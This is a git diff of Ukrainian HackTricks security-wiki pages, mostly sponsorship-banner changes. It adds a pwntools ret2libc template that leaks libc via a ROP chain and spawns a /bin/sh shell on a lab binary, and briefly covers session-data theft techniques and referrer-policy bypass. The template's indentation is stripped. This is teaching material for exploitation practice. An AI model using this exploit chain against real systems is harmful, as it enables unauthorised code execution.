+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md new file mode 100644 index 000000000..9204ea752 --- /dev/null +++ b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md @@ -0,0 +1,242 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Школа взлому AWS для Червоної Команди (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа взлому GCP для Червоної Команди (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} + + +{% code title="template.py" %} +```python +from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools + + +################### +### CONNECTION #### +################### +LOCAL = False +REMOTETTCP = True +REMOTESSH = False +GDB = False +USE_ONE_GADGET = False + +LOCAL_BIN = "./vuln" +REMOTE_BIN = "~/vuln" #For ssh +LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it +ENV = {"LD_PRELOAD": LIBC} if LIBC else {} + +if LOCAL: +P = process(LOCAL_BIN, env=ENV) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets + +elif REMOTETTCP: +P = remote('10.10.10.10',1339) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets + +elif REMOTESSH: +ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) +p = ssh_shell.process(REMOTE_BIN) # start the vuln binary +elf = ELF(LOCAL_BIN)# Extract data from binary +rop = ROP(elf)# Find ROP gadgets + +if GDB and not REMOTETTCP and not REMOTESSH: +# attach gdb and continue +# You can set breakpoints, for example "break *main" +gdb.attach(P.pid, "b *main") + + + +######################### +#### OFFSET FINDER ###### +######################### + +OFFSET = b"" #b"A"*264 +if OFFSET == b"": +gdb.attach(P.pid, "c") #Attach and continue +payload = cyclic(264) +payload += b"AAAAAAAA" +print(P.clean()) +P.sendline(payload) +#x/wx $rsp -- Search for bytes that crashed the application +#print(cyclic_find(0x63616171)) # Find the offset of those bytes +P.interactive() +exit() + + + +#################### +### Find Gadgets ### +#################### +try: +libc_func = "puts" +PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts +except: +libc_func = "printf" +PUTS_PLT = ELF_LOADED.plt['printf'] + +MAIN_PLT = ELF_LOADED.symbols['main'] +POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" +RET = (ROP_LOADED.find_gadget(['ret']))[0] + +log.info("Main start: " + hex(MAIN_PLT)) +log.info("Puts plt: " + hex(PUTS_PLT)) +log.info("pop rdi; ret gadget: " + hex(POP_RDI)) +log.info("ret gadget: " + hex(RET)) + + +######################## +### Find LIBC offset ### +######################## + +def generate_payload_aligned(rop): +payload1 = OFFSET + rop +if (len(payload1) % 16) == 0: +return payload1 + +else: +payload2 = OFFSET + p64(RET) + rop +if (len(payload2) % 16) == 0: +log.info("Payload aligned successfully") +return payload2 +else: +log.warning(f"I couldn't align the payload! Len: {len(payload1)}") +return payload1 + + +def get_addr(libc_func): +FUNC_GOT = ELF_LOADED.got[libc_func] +log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) +# Create rop chain +rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) +rop1 = generate_payload_aligned(rop1) + +# Send our rop-chain payload +#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received +print(P.clean()) # clean socket buffer (read all and print) +P.sendline(rop1) + +# If binary is echoing back the payload, remove that message +recieved = P.recvline().strip() +if OFFSET[:30] in recieved: +recieved = P.recvline().strip() + +# Parse leaked address +log.info(f"Len rop1: {len(rop1)}") +leak = u64(recieved.ljust(8, b"\x00")) +log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") + +# Set lib base address +if LIBC: +LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base +print("If LIBC base doesn't end end 00, you might be using an icorrect libc library") +log.info("LIBC base @ %s" % hex(LIBC.address)) + +# If not LIBC yet, stop here +else: +print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") +P.interactive() + +return hex(leak) + +get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base + + + +############################# +#### FINAL EXPLOITATION ##### +############################# + +## Via One_gadget (https://github.com/david942j/one_gadget) +# gem install one_gadget +def get_one_gadgets(libc): +import string, subprocess +args = ["one_gadget", "-r"] +if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()): +args += ["-b", libc.hex()] +else: +args += [libc] +try: +one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()] +except: +print("One_gadget isn't installed") +one_gadgets = [] +return + +rop2 = b"" +if USE_ONE_GADGET: +one_gadgets = get_one_gadgets(LIBC) +if one_gadgets: +rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains + +## Normal/Long exploitation +if not rop2: +BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh +SYSTEM = LIBC.sym["system"] +EXIT = LIBC.sym["exit"] + +log.info("POP_RDI %s " % hex(POP_RDI)) +log.info("bin/sh %s " % hex(BINSH)) +log.info("system %s " % hex(SYSTEM)) +log.info("exit %s " % hex(EXIT)) + +rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT) +rop2 = generate_payload_aligned(rop2) + + +print(P.clean()) +P.sendline(rop2) + +P.interactive() #Interact with your shell :) +``` +{% endcode %} + +# Загальні проблеми + +## MAIN_PLT = elf.symbols\['main'] не знайдено + +Якщо символ "main" не існує (імовірно, через те, що це обрізаний бінарний файл). Тоді ви можете просто де знаходиться основний код: +```python +objdump -d vuln_binary | grep "\.text" +Disassembly of section .text: +0000000000401080 <.text>: +``` +і встановити адресу вручну: +```python +MAIN_PLT = 0x401080 +``` +## Puts не знайдено + +Якщо бінарний файл не використовує Puts, вам слід перевірити, чи він використовує + +## `sh: 1: %s%s%s%s%s%s%s%s: not found` + +Якщо ви знайдете цю **помилку** після створення **всіх** експлойтів: `sh: 1: %s%s%s%s%s%s%s%s: not found` + +Спробуйте **відняти 64 байти від адреси "/bin/sh"**: +```python +BINSH = next(libc.search("/bin/sh")) - 64 +``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Школа взлому AWS для Червоної Команди експертів (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа взлому GCP для Червоної Команди експертів (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/stealing-sensitive-information-disclosure-from-a-web.md b/stealing-sensitive-information-disclosure-from-a-web.md index feb4752c1..f8440dd89 100644 --- a/stealing-sensitive-information-disclosure-from-a-web.md +++ b/stealing-sensitive-information-disclosure-from-a-web.md @@ -1,37 +1,39 @@ -# Викрадення розкриття чутливої інформації з веб-сторінки +# Викрадення розкриття чутливої інформації з веб-сайту + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -Якщо ви коли-небудь знаходите **веб-сторінку, яка показує вам чутливу інформацію на основі вашої сесії**: Можливо, вона відображає файли cookie, або друкує або дані кредитних карт або будь-яку іншу чутливу інформацію, ви можете спробувати її викрасти.\ +Якщо ви коли-небудь знаходите **веб-сторінку, яка показує вам чутливу інформацію на основі вашої сесії**: Можливо, вона відображає файли cookie, або друкує або деталі кредитних карт або будь-яку іншу чутливу інформацію, ви можете спробувати її викрасти.\ Ось основні способи, які ви можете спробувати використати для досягнення цієї мети: -* [**Обхід CORS**](pentesting-web/cors-bypass.md): Якщо ви можете обійти заголовки CORS, ви зможете викрасти інформацію, виконуючи запит Ajax для зловмисної сторінки. -* [**XSS**](pentesting-web/xss-cross-site-scripting/): Якщо ви знаходите уразливість XSS на сторінці, ви можете використати її для викрадення інформації. +* [**Обхід CORS**](pentesting-web/cors-bypass.md): Якщо ви можете обійти заголовки CORS, ви зможете викрасти інформацію, виконавши запит Ajax для зловмисної сторінки. +* [**XSS**](pentesting-web/xss-cross-site-scripting/): Якщо ви знаходите уразливість XSS на сторінці, ви можете використовувати її для викрадення інформації. * [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): Якщо ви не можете впровадити теги XSS, ви все ще можете викрасти інформацію, використовуючи інші звичайні теги HTML. -* [**Clickjaking**](pentesting-web/clickjacking.md): Якщо немає захисту від цього виду атаки, ви можете зманити користувача надіслати вам чутливі дані (приклад [тут](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). +* [**Clickjaking**](pentesting-web/clickjacking.md): Якщо немає захисту від цього виду атаки, ви можете зманити користувача надіслати вам чутливі дані (приклад [тут](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/todo/6881-udp-pentesting-bittorrent.md b/todo/6881-udp-pentesting-bittorrent.md index e4036d58e..43f082b0e 100644 --- a/todo/6881-udp-pentesting-bittorrent.md +++ b/todo/6881-udp-pentesting-bittorrent.md @@ -1,13 +1,14 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Школа взлому AWS для експертів Red Team (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа взлому GCP для експертів Red Team (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт HackTricks AWS Red Team)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/todo/burp-suite.md b/todo/burp-suite.md index 28ca41492..d204b63ec 100644 --- a/todo/burp-suite.md +++ b/todo/burp-suite.md @@ -1,24 +1,25 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # Базові Payloads -* **Простий список:** Просто список, що містить запис на кожному рядку +* **Простий список:** Просто список, що містить запис у кожному рядку. * **Файл виконання:** Список, який читається під час виконання (не завантажується в пам'ять). Для підтримки великих списків. -* **Зміна регістру:** Застосувати деякі зміни до списку рядків (без змін, до нижнього регістру, до ВЕРХНЬОГО регістру, до Правильного імені - перший символ з великої літери, решта до нижнього -, до Правильного імені - перший символ з великої літери, решта залишається таким самим -. -* **Числа:** Генерувати числа від X до Y з кроком Z або випадково. +* **Зміна регістру:** Застосувати зміни до списку рядків (без змін, до нижнього регістру, до ВЕРХНЬОГО регістру, до Правильного імені - перша літера з великої, решта до нижнього -, до Правильного імені - перша літера з великої, решта залишається такою ж -. +* **Числа:** Генерувати числа від X до Y з кроком Z або випадковим чином. * **Брутфорсер:** Набір символів, мінімальна та максимальна довжина. [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload для виконання команд та отримання виводу через запити DNS до burpcollab. @@ -26,18 +27,3 @@ {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) - - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. - -
diff --git a/todo/emails-vulns.md b/todo/emails-vulns.md index 90273c7d0..df97c42c8 100644 --- a/todo/emails-vulns.md +++ b/todo/emails-vulns.md @@ -1,19 +1,35 @@ # Вразливості електронної пошти +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## -## +## + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/todo/interesting-http.md b/todo/interesting-http.md index 282e38931..576307553 100644 --- a/todo/interesting-http.md +++ b/todo/interesting-http.md @@ -1,17 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
- +{% endhint %} # Заголовки реферерів та політика @@ -19,11 +19,11 @@ ## Витік чутливої інформації -Якщо на веб-сторінці в який-небудь момент знаходиться чутлива інформація в параметрах запиту GET, якщо сторінка містить посилання на зовнішні джерела або зловмисник може змусити/запропонувати (соціальний інженерінг) користувача відвідати URL, керований зловмисником. Це може дозволити витік чутливої інформації в останньому запиті GET. +Якщо на веб-сторінці в який-небудь момент знаходиться чутлива інформація в параметрах запиту GET, якщо сторінка містить посилання на зовнішні джерела або зловмисник може зробити/запропонувати (соціальний інжиніринг) користувачеві відвідати URL, котрим керує зловмисник. Це може дозволити витягти чутливу інформацію з останнього запиту GET. ## Пом'якшення -Ви можете змусити браузер дотримуватися **політики реферера**, яка може **запобігти** витоку чутливої інформації до інших веб-додатків: +Ви можете змусити браузер дотримуватися **політики реферера**, яка може **запобігти** відправці чутливої інформації іншим веб-додаткам: ``` Referrer-Policy: no-referrer Referrer-Policy: no-referrer-when-downgrade @@ -34,7 +34,7 @@ Referrer-Policy: strict-origin Referrer-Policy: strict-origin-when-cross-origin Referrer-Policy: unsafe-url ``` -## Протидія заходам +## Протидія контролю Ви можете перевизначити це правило, використовуючи HTML мета-тег (зловмисник повинен використовувати HTML ін'єкцію): ```markup @@ -44,18 +44,3 @@ Referrer-Policy: unsafe-url ## Захист Ніколи не розміщуйте будь-які чутливі дані всередині параметрів GET або шляхів в URL-адресі. - - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. - -
diff --git a/todo/other-web-tricks.md b/todo/other-web-tricks.md index 2d8d78e1e..02590e2e0 100644 --- a/todo/other-web-tricks.md +++ b/todo/other-web-tricks.md @@ -1,31 +1,32 @@ # Інші веб-трюки +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
